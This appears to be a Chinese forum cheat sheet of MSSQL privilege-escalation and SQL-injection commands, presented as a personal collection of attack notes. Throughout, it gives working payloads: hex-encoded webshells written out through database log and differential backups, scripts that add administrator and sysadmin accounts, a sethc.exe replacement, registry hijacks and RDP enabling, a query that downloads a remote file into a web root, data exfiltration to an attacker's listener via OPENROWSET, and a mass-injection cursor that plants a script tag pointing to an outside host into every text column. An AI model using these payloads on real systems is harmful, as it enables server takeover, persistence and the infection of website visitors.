昔日

一些 MSSQL提权 常用命令及提权技巧

_____夏丶眷べ:

404网安:



-得到硬盘文件信息 
--参数说明:目录名,目录深度,是否显示文件 
execute master..xp_dirtree 'c:' 
execute master..xp_dirtree 'c:',1 
execute master..xp_dirtree 'c:',1,1

-------------------------------
db取系统权限5步之hta
-------------------------------

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x636E36353636 backup database @a to disk=@s--

Drop table [cn911];create table [dbo].[cn911] ([cmd] [image])--

insert into cn911(cmd) values (0x3C3F706870206576616C28245F504F53545B61685D293B3F3E)--

declare @a sysname,@s varchar(4000) select @a=db_name (),@s=0x443A5C686F7374696E675C777777726F6F745C753467616D655F636F6D5C6874646F63735C696D6167655C782E706870 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

Drop table [cn911]--

-------------------------------
db取系统权限6步之bat
-------------------------------
alter database [test] set RECOVERY FULL--
create table cmd (a image)--
backup log [test] to disk = 'c:\windows\temp\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406563686F206F66660D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F632064656C202530250D0A40636D642E657865202F632064656C202530250D0A400D0A40)--
backup log [test] to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\x.bat'--
drop table cmd--

@echo off
@echo off
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 localgroup administrators sqldebugger /add
@cmd.exe /c net1 localgroup administrators sqldebugger /add
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
@cmd.exe /c del %0%
@cmd.exe /c del %0%
@
@

-------------------------------
sa取系统权限之sp_makewebtask
-------------------------------
sp_makewebtask 'c:\1.hta',' select ''<script language=VBScript> 
On Error Resume Next
set wshshell=createobject("wscript.shell") 
a=wshshell.run ("command.com /c net1 user jack jackjack123!@# /add",0) 
</script>'' ';--
------------------------------
xp_lake2 提权
------------------------------

执行命令
exec xp_lake2 'ipconfig'
添加存储过程
sp_addextendedproc xp_cmdshell,@dllname='E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'
sp_addextendedproc 'xp_lake2', 'E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'
删除存储过程
sp_dropxtendedproc xp_lake2

------------------------------
xp_cmdshell 提权
------------------------------

执行命令
exec master.dbo.xp_cmdshell 'cmd /c ipconfig'

开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

xp_cmdshell新的恢复办法 (效果很好)
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在

手工xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
恢复
;use master;dbcc addextendedproc ("sp_oacreate","odsole70.dll")
;use master;dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
-----
;exec/**/master..sp_addextendedproc/**/[xp_cmdshell],[xplog70.dll]--
;use/**/master/**/dbcc/**/addextendedproc([xp_cmdshell],[xplog70.dll])--
;use/**/master/**/dbcc/**/addextendedproc([sp_OACreate],[odsole70.dll])--

恢复xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog70.dll
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','F:\xx.com\xplog70.dll'

常见情况恢复执行xp_cmdshell.

1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_dropextendedproc "xp_cmdshell"
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 
然后按F5键命令执行完毕

4 SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
然后按F5键命令执行完毕

mssql2005

启用xp_cmdshell

USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE

--关闭xp_cmdshell
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE



--------------------------------------
只要ws没删 用下面这个语句百试不爽
declare [url=https://www.t00ls.net/space-uid-3295.html]@shell[/url] int exec sp_oacreate 'wscript.shell',[url=https://www.t00ls.net/space-uid-3295.html]@shell[/url] output exec sp_oamethod [url=https://www.t00ls.net/space-uid-3295.html]@shell[/url],'run',null,'c:\windows\system32\cmd.exe /c ipconfig'

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [d:\cmd.exe /c dir c:\] --

--------------------------------------

--------------------------------------
sa(shift取系统权限)

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\sethc.exe'; 

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\dllcache\sethc.exe';

--------------------------------------

在WEBSHELL里转了半天还是没什么收获,感觉还是得靠那个SA来提权,于是笔者问了下朋友,他说你怎么忘了沙盒模式?
看来最近脑子晕了于是在查询分析器里执行:
意思是修改注册表,开启沙盒:
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

0   禁止一切(默认) 
1   使能访问ACCESS,但是禁止其它 
2   禁止访问ACCESS,但是使能其他 
3   使能一切

通过沙盒添加用户
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c ipconfig")');

添加系统帐户(重启后生效DB权限就可以执行)
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack','REG_SZ','ipconfig'
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack1','REG_SZ','net localgroup administrators jack /add' 

映像劫持
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\currentversion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\taskmgr.exe'

--------------------
sa radmin提权
--------------------
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 
即可修改密码为12345678。如果要修改端口值 
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

删除添加储存过程
drop procedure sp_addlogin
add procedure sp_addlogin

恢复存储过程

于是马上想到恢复存储过程来执行命令,于是在查询分析器里执行: 

use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' 
exec sp_addextendedproc xp_dirtree,'xpstar.dll' 
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' 
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' 
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAStop,'odsole70.dll' 
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 
exec sp_addextendedproc xp_regread,'xpstar.dll' 
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc sp_makewebtask,'xpweb70.dll'

恢复sp_addextendedproc,语句如下: 
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc



读取配置文件信息

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

写进su配置文件提权

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,

查看终端
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'


SQL语句下载

DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT

EXEC sp_oacreate [Microsoft.XMLHTTP],@http output
EXEC @hr = sp_oamethod @http,[Open],null,[GET],[[url]http://xxx.org/jsp.zip[/url]],0 
EXEC @hr = sp_oamethod @http,[Send],null 
EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output
EXEC @hr=sp_oacreate [ADODB.Stream],@down output
EXEC @hr=sp_OASetProperty @down,[Type],1 
EXEC @hr=sp_OASetProperty @down,[mode],3 
EXEC @hr=sp_oamethod @down,[Open],null 
EXEC @hr=sp_oamethod @down,[Write],null,@B 
EXEC @hr=sp_oamethod @down,[SaveToFile],null,[d:\java\Tomcat 5.5\webapps\XXXX\1.jsp],1 ;--









web注入
字符型需要在浏览器输入' 如id=xx';
数字型则不需要          如id=xx;

sa直接写一句话
sp_makewebtask 'e:\gygov.com\xx.asp',' select ''<%execute request("ah")%>'' ';--

-------------------------------------------------------------------
sql备份

日志备分WEBSHELL标准的七步:
1.InjectionURL';alter database mm_db set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL';backup log mm_db to disk = 'c:\cmd' with init-- (减少备分数据的大小)
4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句话木马)
5.InjectionURL';backup log mm_db to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径)
6.InjectionURL';drop table cmd-- (删除新建的cmd表)
7.InjectionURL';alter database mm_db set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

数据库差异备份代码:

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表

2、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:\xx.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为xx.asp。

5、drop table [jm_tmp]-- 删除此表。

Mssql2005 Log备份Webshell 9步
;alter/**/database/**/[ikoreadb]/**/set/**/recovery/**/full--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;drop/**/table/**/[JCZ3Tmp]--
;create/**/table/**/[JCZ3Tmp]([a]/**/image)--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;insert/**/into/**/[JCZ3Tmp]([a])/**/values(0x3C2545786563757465287265717565737428226168222929253E)--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x64003A005C0069006B006F007200650061007700650062005C007500730065007200660069006C00650073005C00660069006C0065005C007300730073002E00610073007000/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;drop/**/table/**/[JCZ3Tmp]--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--

-----------------------------------------------------------------------

-获得MS SQL的版本号 
execute master..sp_msgetversion

获取当前库服务器机器名
Select host_name() 

-------------------------------------
创建个登陆mssql的帐号
-------------------------------------
exec master.dbo.sp_addlogin jack,jack;--
加mssql帐户为jack
exec master.dbo.sp_addsrvrolemember satan,sysadmin;--
把创建的mssql登陆帐号jack提升到sysadmin

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!

--列出服务器上所有windows本地组 
execute master..xp_enumgroups //dbo 

--显示系统上可用的盘符 
execute master..xp_availablemedia   //dbo 


//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
or convert(int, system_user)=1--
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);-- 

检测是否支持多行
;declare @d int;-- 

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 

停掉或激活某个服务。 
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484

xp_unpackcab
解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

-----------------------------
cmd加sql帐户
-----------------------------
echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry 
echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry 
cmd.exe /c isql -E /U alma /P /i c:\test.qry

mssql更新及查询语句

select * from  db_name  where tablename='x140m1n6'
从db_name表中寻找出tablename是 x140m1n6的信息数据

UPDATE db_name SET monery = '10.00' WHERE UserName = 'x140m1n6'
修改数据库db_name,设置Username为x140m1n6的money项为10.

查询
select * from dnt_users where uid=577


插马
;update+表名+set+字段名=插马地址+where+id=(要插马的id)--
例子
http://www.xxx.com/xxx.asp?id=2122;update+law+set+title=0xC3BFC8D5BEADBCC3D0C2CEC5A3BAB0D9CBBCC2F2B7C5BBBAD6D0B9FACDD8D5B9BDC5B2BD0D0A+where+id=1115--

sql2005存储添加
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;


------------------------------------------
sql开 3389

'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal server','Tsenabled','reg_dword',1;---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';---- 
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_cmdshell 'iisreset /reboot';----

-------------------------------------------

在db权限并且分离获取mssql数据库服务器ip的方法 

1.本地nc监听   nc -vvlp 80

2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;-- 
其他的都不用管


去掉tenlnet的ntlm认证 
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—

public权限列目录 

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧 

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表 

create table ##nonamed( 

       dir ntext, 

       num int



--调用存储过程把执行回来的数据存到临时表里面 

insert ##nonamed execute master..xp_dirtree 'c:\',1 

--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了 

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree') 

select * from ##nonamed 

以上方法,也就是说public可以遍历用户服务器的目录

dtproperties这个表默认是public可写的,提示够清楚了吧
手工列目录语句
';DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100))  Insert D99_Tmp exec master..xp_dirtree "C:\", 1,1--

' And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0  and ''='

2005恢复 xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

2005恢复 sp_oacreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

清理掉SQL日志
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int

mssql清除日志

DUMP TRANSACTION 数据库名 WITH NO_LOG

对mssql事务日志变大的处理 清空日志 
DUMP TRANSACTION 数据库名 WITH NO_LOG

截断事务日志 
BACKUP LOG 数据库名 WITH NO_LOG

收缩数据库 
DBCC SHRINKDATABASE(数据库名) 


mssql导出数据库表
本机
exec master..xp_cmdshell 'bcp ikoreaDB..member out d:\tt.xls -c -t, -T'
远程
exec master..xp_cmdshell 'bcp Databse..table out d:\tt.txt -c -t , -Sservername -Uuser -Ppassword'
servername为sqlserver的名字
user为id
password 为密码


映像劫持ii
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\Currentversion\Image File Execution Options\osk.exe','debugger','REG_sz','g:\web\rootsite\djsite\uploadfile\nt.exe on';-- 



SQL开3389命令2007-05-19 12:22把一次从SQL开3389的记录过程发出来,望对新手有用

注://为注释
实例过程:
连接到主机:

xxx.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:

xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,

结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:

xp_cmdshell "echo [Components] > c:\hack" //在c盘根目录建写入一个文件,文件名hack大家可以自己改为自己的
执行成功,


命令:

xp_cmdshell "echo TsEnable = on >> c:\hack" //追加写入
执行成功,

结果:


命令:

xp_cmdshell "type c:\hack" //看看hack里的内容是否正确
执行成功,

结果:
[Components] 
TsEnable = on
TsEnable = on

命令:

xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hack /q" //开3389,成功的话过会肉机会重启!!
执行成功,

结果:
GetLocalManagedApplications returned (2)
 

数据库挂马
针对ASP+mssql攻击测试代码:
declare @t varchar(255),
@c varchar(255) 
declare table_cursor cursor for
select a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
open table_cursor
fetch next from table_cursor into @t,@c 
while(@@fetch_status=0) 
begin
exec('update ['+@t+'] set ['+@c+']=
rtrim(convert(varchar,['+@c+']))+cast(0x223E3C2F613E3C2F7469746C653E3C736372697074206C616E67756167653D6A617661736372697074207372633D687474703A2F2F2533352533312536462536362532452536452536352537342F696D672E6769663E3C2F7363726970743E as varchar(80))') 
fetch next from table_cursor into @t,@c 
end
close table_cursor
deallocate table_cursor


"></a></title><script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>

;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F613E3C2F7469746C653E3C696672616D65207372633D687474703A2F2F7777772E676F6F676C652E636F6D2077696474683D313030206865696768743D3130303E3C2F696672616D653E20%20aS%20vArChAr(80))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;--


创建sp_makewebtask这个存储过程

/********************************************************************************************/  
/* Create SP's                                                                              */  
/********************************************************************************************/  
  
--====================================================================================  
-- Add extended stored procedures for Web Server support.  
--  
-- sp_makewebtask: Creates and defines the Web Page Task  
  
CREATE PROCEDURE sys.sp_makewebtask  
@outputfile  nvarchar(255),  
@query   ntext,  
@fixedfont  tinyint = 1,    -- 0/1   
@bold   tinyint = 0,    -- 0/1   
@italic   tinyint = 0,    -- 0/1   
@colheaders  tinyint = 1,    -- 0/1   
@lastupdated tinyint = 1,    -- 0/1   
@HTMLheader  tinyint = 1,    -- 1-6   
@username  nvarchar(128) = NULL,  
@dbname   nvarchar(128) = NULL,  
@templatefile nvarchar(255) = NULL,  
@webpagetitle nvarchar(255) = NULL,  
@resultstitle nvarchar(255) = NULL,  
@URL   nvarchar(255) = NULL,  
@reftext  nvarchar(255) = NULL,  
@table_urls  tinyint = 0,    -- 0/1; 1=use table of URLs   
